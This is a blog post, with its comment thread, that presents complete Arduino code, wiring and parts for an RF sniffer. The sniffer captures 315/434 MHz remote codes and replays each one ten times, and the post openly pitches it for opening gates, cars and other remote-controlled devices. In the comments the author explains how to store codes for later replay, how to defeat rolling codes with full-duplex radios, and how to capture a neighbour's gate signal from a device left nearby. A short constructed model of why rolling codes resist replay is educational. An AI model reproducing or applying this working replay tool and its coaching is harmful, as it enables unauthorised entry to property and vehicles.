RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315 MHz/434 MHz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.


TIP – The size of the antenna is VERY important. Don’t neglect it: use the right length for the frequency, and use a wavelength calculator to work it out (and for future reference).


The story

I wanted to see how easy it is to open a keyless car using an Arduino. Then I wanted to simultaneously control multiple appliances operating on different frequencies (315 MHz/434 MHz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kinds of RF receivers out there. You have been warned.

The current version of the sniffer resends whatever it sniffs 10 times. This behavior is easily changed (see RESEND_SNIFFED_VALUES in the code).

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.


Shopping List

Amount  Part Type            Properties
2       Inductor             wire antenna
1       Red LED – 5mm        package 5 mm [THT]; leg yes; color Red (633nm)
1       Arduino Uno (Rev3)   type Arduino UNO (Rev3)
1       315 MHz RF-LINK_RX   package rf-link_rx; part # WRL-10533
1       434 MHz RF-LINK_RX   package rf-link_rx; part # WRL-10532
1       315 MHz RF-LINK_TX   package rf-link_tx; part # WRL-10535
1       434 MHz RF-LINK_TX   package rf-link_tx; part # WRL-10534


Scheme

We connect both receivers/transmitters like the following:

[Breadboard wiring diagram: RF_Sniffer_bb]

Code

And here is the Arduino code. Use at your own risk.


/*
 * RF Sniffer (C) Elia Yehuda 2014
 *
 * This program was coded.
 *
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 *
 */

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
{
        // print fast to console
        Serial.begin(115200);

        // the LED pin has to be driven as an output; without this,
        // digitalWrite() only toggles the input pull-up and the LED barely glows
        pinMode(LED_PIN, OUTPUT);

        // 315 receiver on interrupt #0 (pin #2)
        rf315Switch.enableReceive(0);
        // 315 transmitter on pin #4
        rf315Switch.enableTransmit(4);
        // how many resends
        rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

        // 434 receiver on interrupt #1 (pin #3)
        rf434Switch.enableReceive(1);
        // 434 transmitter on pin #5
        rf434Switch.enableTransmit(5);
        // how many resends
        rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

        Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure (returns a static buffer)
char *tobin32(unsigned long x)
{
        static char b[33];
        b[32] = '\0';

        for (int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        }

        return b;
}

// log one sniffed code, replay it, then re-arm the receiver.
// rfswitch is taken by reference so resetAvailable() acts on the real
// receiver object and not on a temporary copy
void process_rf_value(RCSwitch &rfswitch, int rf)
{
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, HIGH);

        value = rfswitch.getReceivedValue();
        if (value) {
                snprintf(str, sizeof(str), "[+] %d Received: %s / %010lu / %02u bit / Protocol = %u",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol());
                Serial.println(str);

                // resend the sniffed value (RESEND_SNIFFED_VALUES times)
                rfswitch.send(value, rfswitch.getReceivedBitlength());
        } else {
                // nothing decodable was captured, so there is nothing to replay
                snprintf(str, sizeof(str), "[-] %d Received: Unknown encoding (0)", rf);
                Serial.println(str);
        }

        // reset the switch to allow more data to come
        rfswitch.resetAvailable();
        // stop light to show end of transmission
        digitalWrite(LED_PIN, LOW);
}

void loop()
{
        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);
        }

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);
        }
}
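The sketch above replays whatever fixed code it hears, and the comments below note that rolling-code remotes are not affected. As an added example that is not part of the original post, this constructed C model shows why: a fixed-code receiver has no notion of freshness, while a rolling-code receiver rejects any counter it has already accepted. The frame layout, WINDOW, the ids and the codes are all constructed for illustration; a real rolling-code scheme would also encrypt or authenticate the counter.

```c
#include <stdint.h>
#include <stdbool.h>
/* Constructed model, not the page's code: a fixed-code receiver accepts any
 * frame equal to its programmed code; a rolling-code receiver also demands a
 * fresh counter. A real rolling scheme encrypts/authenticates the counter as
 * well; that is left out so the freshness check stands on its own. */
#define RESEND 10           /* the sketch's RESEND_SNIFFED_VALUES */
#define WINDOW 16           /* button presses out of range still tolerated */

typedef struct { uint32_t code; } fixed_rx_t;
typedef struct { uint32_t id; uint32_t last_counter; } rolling_rx_t;
typedef struct { uint32_t id; uint32_t counter; } rolling_frame_t;

bool fixed_accept(const fixed_rx_t *rx, uint32_t code)
{
        return code == rx->code;        /* no notion of freshness at all */
}

bool rolling_accept(rolling_rx_t *rx, rolling_frame_t f)
{
        if (f.id != rx->id)
                return false;
        uint32_t delta = f.counter - rx->last_counter;  /* modulo 2^32 */
        if (delta == 0 || delta > WINDOW)
                return false;           /* replayed, or too far ahead */
        rx->last_counter = f.counter;   /* every older counter is now dead */
        return true;
}

/* One legitimate press, then the sketch replays what it heard RESEND times.
 * Returns how many frames the receiver accepted. */
int fixed_code_under_replay(void)
{
        fixed_rx_t rx = { .code = 0x00A5C3F0u };   /* constructed gate code */
        uint32_t heard = 0x00A5C3F0u;              /* what the sniffer saw */
        int accepted = fixed_accept(&rx, heard);
        for (int i = 0; i < RESEND; i++)
                accepted += fixed_accept(&rx, heard);
        return accepted;                /* 11: every replay opens the gate */
}

int rolling_code_under_replay(void)
{
        rolling_rx_t rx = { .id = 0x1234, .last_counter = 41 };
        rolling_frame_t heard = { .id = 0x1234, .counter = 42 };
        int accepted = rolling_accept(&rx, heard);
        for (int i = 0; i < RESEND; i++)
                accepted += rolling_accept(&rx, heard);
        return accepted;                /* 1: the replays are rejected */
}
```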

57 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.”

    1. ofc.

      The hw scheme I provided is 100% the same as the one I used in my testing. The sw part is stripped-down code from my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons😉

      Most vulnerable targets I found are remote-controlled gates and old cars. Also, weather stations seem to produce a lot of noise.

      Using the same logic, one can add 816 MHz tx/rx to cover most widely used RF out there. And rule them all🙂

  1. Awesome project. Can u give any details as to how you can save the codes it sniffs? I’m looking to do an automation project and this fits the bill.

    Thanks

  2. Simple circuit, simple code – but not flying! Receiver not seeing anything? I see chatter on other sites about a 1M resistor between the data line and ground, a 330 Mfd cap, and production changes on the RX board pushing less power through the data line. No joy! Any clues???

  3. Ziggy, really like your project. I have the library, replicated the circuit and code – and quadruple checked everything – but the receivers are never ‘available’. I have three 315 MHz devices to ‘sniff’ but with/without antennas, placing devices near/far from the antenna and even ordering/installing new RX / TX boards – has no impact on the results. Commenting out the .available test just yields the same data stream regardless of the device I test and, in fact, powering off the circuit has no impact on the data stream. Used SparkFun supplier.
    Please, any hints for me?

    1. I totally understand your frustration since it took me a while and some trial & error to get it all to work as smoothly (eg, I too have looked into connecting a resistor to the data line…).

      I think you should first make sure your hw is 100% supported with this library; maybe you need to use a different lib/code to match your receiver – play with the code until you start getting some RAW (hex) data, then adjust it to your purpose.

      g’luck.

  4. I have to reach our house by a shared drive with an electronic gate. The owner will not give the remote to copy. Is there any way I can buy a sniffer so that I can copy the opening code?
    I know nothing about electronics

      1. Thank you for that but it looks as though I have to get hold of my neighbours remote to work it. What I need is something I can leave in my garden so that when he uses his remote it will pick up the signal. Then I should be able to duplicate it with this sort of device you suggest

    1. Hello Roger,

      What your neighbor has done is illegal. You have the right to access your property and he cannot unreasonably deny you access. If his property is considered the dominant property, he has the right to put up a gate, but he must give you unrestricted access to it. This includes a key. It is illegal for him to tell you to wait for him to open the gate for you, as you may need access when he is not home.

      1. Thank you
        To a non-electrician it looks very complex to make a sniffer and I am trying to find someone in the UK to make the device. How close does it need to be to the gate to pick up the signal – or maybe it needs to be close to the remote being used?

      2. IIRC from my testing, the sniffer worked at a 10 meter distance, and obviously can be extended with better equipment.

        And I’m no electrician by any means🙂 Just start hacking around with Arduino, and you’ll find yourself playing with those [electronic] lego pieces in no time.

  5. I want to know: does this sketch work with any modulation and encoding out of the box? For example, does it simply sniff and transmit raw data? Kind of like hackrf_transfer using a raw iq/wav file to do a replay attack? Or does the library define some sort of encoding like ASK/OOK?

    Thank you

  6. Hi, thanks for your tutorial!! Just wondering if you could help me out. I’ve got an Arduino Uno and a 433 MHz receiver and transmitter. I’m having trouble: I can pick up signals from some remotes but not others, but they are all 433 MHz remotes. I see in a lot of the tutorials people are using the 8-pin 433 MHz receiver; mine’s only the 4-pin, which from what I can tell is the cheap version by what it cost😄, and I see a lot more people using the other ones. Could this be why I’m only picking up certain 433 MHz signals from some remotes and not others? Sorry if it’s a dumb question! Still new to this.

    1. Good question, but I have to admit I never played with 8-pin receivers. Maybe it’s an encoding issue, distance, antenna – I would play with any of those vectors to test for any changes. Try to obtain an SDR (HackRF or alike) to watch your signals and debug it further😉

      1. Hello Z4ziggy

        I am going to try and find someone to make the sniffer for me but before I do can I clarify one thing.
        If I locate the device near the gate and activate it when he exits will it record the signal for me?
        If it does that is ideal if I can then transmit the signal to one of the RF duplicators that you advise I assume?

        many thanks

        Roger

      2. Yep, the device should sniff the signal when located near the gate. And those duplicators already have the ‘record’ function in them, so they should work best for u.

  7. I’m confused, how do you start and end it? Where are the buttons? Also, I did this and I get an error for RCSwitch missing; where do I put that? Is that code that is supposed to be added?

    1. There is no start/stop to the code provided – only an endless sniffing & replaying routine, as a basic template example.
      Regarding RCSwitch, consult your IDE docs on how to install Arduino libraries (usually it’s extracting the zip into the ~/Arduino/libraries/ folder).

  8. Hello z4ziggy, is there any chance to write in private?
    I connected all wires, but nothing is working. The LED is flashing about 5 times the first time I connect the Arduino to the PC. Then it stops. The serial monitor is showing nothing except + Listening.
    When connecting the LED to the breadboard -> the orange LED on the Arduino illuminates with half of its power.
    I would appreciate your help. Thanks

    1. I doubt I can help much – you’ll have to do the debugging yourself.
      I suggest you start with connecting only 1 transmitter and getting it to work 1st – it might take some playing with the code and the pins to get the correct layout, so don’t be discouraged – enjoy the path😉

  9. Is it possible for me to build this RF sniffer if I am not in anyway experienced with the subject(programming or electronics)?

  10. is it possible for me to build the RF sniffer with no experience with electronics nor programming?

    I want to build the sniffer but I also have a question or two.

  11. Here is just one question. Can this device open any RF receiver without having any contact with, let’s say, the remote for the garage? Can I just walk up to any random garage and with this project just open it? Please correct me if my point of view on this project is totally off the subject, and if you don’t mind, is there not a link or any information on what exactly this RF sniffer does? I posted a link on Yahoo asking the same question and no one is getting back to me. But if it is too much inconvenience, I understand.

    1. The project I’m describing here is a sniffer – eg, it will sniff an existing signal, and will let you replay it at your will. It will not fuzz or try different combos to open unknown garage doors. You can find in the comments above links to other ready-made products (sold on ebay/aliexpress) which won’t require much technical know-how like this one.

  12. SORRY Z4ZIGGY for the hassle. So this project won’t work on those high-tech remotes that frequency level cycle, or I am not sure?

  13. I am truly sorry for all the questions, but I would like to ask you: is there such a device that can work on remotes that have the cycling frequencies on them? Another thing I would like to know: is there such a device like you mentioned before that can fuzz or try different combos to open unknown garage doors?

    I really try to find this information on Google but it’s that easy for me, and like I said before, if it’s too much inconvenience, I understand.

    Thanks z4ziggy

  14. Hi z4ziggy, I hope you don’t mind me bothering you with all the questions, but I have done some more research on RF sniffers and I have found Samy Kamkar’s invention to be quite interesting; I am sure you have heard of him. His device (RollJam) can bypass rolling codes, which is the device I asked you about previously. I just wanted to know if the HackRF One device can do everything your RF sniffer can do?

    1. Samy’s device is a more advanced device. As I said earlier – this project is a starting point.

      Regarding HackRF – it should be doable. Maybe consider BladeRF or others which are full-duplex.

  15. Hi z4ziggy, please can you answer this question for me; I tried asking others but I don’t succeed. I am sure you heard of Andrew Nohawk, and I want to learn how to hack rolling codes and he shows you how on his website. I want to learn while having everything I need in my possession; I would find it much easier that way, going through it step by step. As I read through it I find it quite difficult finding out everything I need. Could you be kind enough to tell me everything I need to go about doing this? PS I don’t know whether I should get a YARD Stick One or RfCat or even both, so if you could help me with this I would be so grateful.

    hope to hear from you soon!

    thanks

    1. He actually uses TWO YARD Stick Ones since it’s a half-duplex device (eg, it can only send OR receive at the same time). You can use a BladeRF or another full-duplex SDR device which supports this frequency range. Good luck.

  16. So if I get a full-duplex SDR device, I can receive and transmit at the same time, then there is no need for two devices.
    What does he use to jam the signal, since I am trying to hack rolling codes?

    I really appreciate your help; I try asking these questions on Yahoo but people just think I am some thief trying his luck.

  17. Hello z4ziggy, I am doing research at my school and am interested in possibly using your design to demonstrate this device to our local police department and write a report on the increasing problem of these types of devices. Is everything you listed, as well as the code and diagram, enough to get one to work? What is the difference between the code you have here and your full one? I also wanted to get your approval on the use of your design for this purpose.

    1. Feel free to use this as you like. My private code was a bit more malicious – it saved the sniffed data and allowed me to resend it whenever I wanted (by pressing a button), but this should be enough for a demo and you can always enhance it yourself. Good luck.
